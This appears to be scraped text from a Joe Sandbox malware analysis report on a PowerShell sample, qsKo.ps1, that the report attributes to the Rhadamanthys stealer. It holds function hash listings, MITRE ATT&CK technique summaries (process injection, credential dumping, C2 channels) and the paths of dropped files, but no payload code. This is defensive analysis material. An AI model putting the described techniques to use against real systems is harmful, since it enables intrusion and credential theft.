Function 0000022FAA4B8038 Relevance: 1.3, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT(?,?,?,?,?,?,?,0000022FAA4B454C), ref: 0000022FAA4B8089

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 842a0fcfbae77ddf7c9ef53a2fdb97499bdab63288fbf5ca7410195d085d151d
Instruction ID: 0e0c529dd38dd41caf0022dfd7080651218ae287ea4fe0fbd7c161b3ce0a567d
Opcode Fuzzy Hash: 842a0fcfbae77ddf7c9ef53a2fdb97499bdab63288fbf5ca7410195d085d151d
Instruction Fuzzy Hash: A5319E30215A099FEFD8EB59D6A976833B2FB94301F5440B8AC0ECA2A6CF289855C750

Function 0000022FAA4B99D4 Relevance: 1.3, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT(?,?,?,?,?,?,?,00000000,?,0000022FAA4BF2B4), ref: 0000022FAA4B9A65

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7a297f1986504495161170ee7aee10f4abf84ff64ce9de3e5e03136cde0e8aee
Instruction ID: 2e0f96db2c11f2d2f545335ab62987a747293de5ccca0bdc39338596fa1a2664
Opcode Fuzzy Hash: 7a297f1986504495161170ee7aee10f4abf84ff64ce9de3e5e03136cde0e8aee
Instruction Fuzzy Hash: 96219370214A099FEB98EF5CC598B6477F1FB58305F5440B9AC09CB2A7CB75D846CB40

Function 0000022FAA4C48F8 Relevance: 1.3, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT(?,?,?,?,?,?,00000008,0000022FAA4BFD09,?,?,?,?,?,?,?,0000022FAA4B7FA9), ref: 0000022FAA4C491F

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7dd69658861cf162b6e8f5607d2afe179510db48a5e0ef57d5537ff1bbbeb537
Instruction ID: 118f48fa5430595a83da77979339f80fd7de74448980e4ae9fff39089551a728
Opcode Fuzzy Hash: 7dd69658861cf162b6e8f5607d2afe179510db48a5e0ef57d5537ff1bbbeb537
Instruction Fuzzy Hash: 1DF03930121A094BEF98DF99C2D8B6572B0FB88301F5480A9AC18CA299C778C895C740

Function 0000022FAA4B3CB0 Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT(?,?,?,?,?,?,?,?,?,0000022FAA4B4590), ref: 0000022FAA4B3CD9

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8cb90f487aa88aaeb899a82658a4f96ee9d6a5816eee242e74479443c5ca5ecc
Instruction ID: c3d77fae0b079c8cf0d4851da9afd5ae55ce292f58c29bc273d7448f8705978e
Opcode Fuzzy Hash: 8cb90f487aa88aaeb899a82658a4f96ee9d6a5816eee242e74479443c5ca5ecc
Instruction Fuzzy Hash: 7FE0E631211E199EEB95ABB5CA5C75032F0F758304F980574E805C35E0E66CF845F741

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qsKo.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Documents\nUCp.exe (copy)

C:\Users\Public\Documents\nUCp.mp3

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gt4bnrcn.fji.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m051kwi2.pse.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ZDG88LRT27OJ8WWM0Z9.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Static File Info

General

File Icon

Windows Analysis Report
qsKo.ps1

Function 00FF4E5A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
memorystringCOMMON

Function 00FFC146 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 010022CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129
memoryCOMMON

Function 00FF8946 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 01002098 Relevance: 2.7, APIs: 2, Instructions: 163
memoryCOMMON

Function 00FFC211 Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre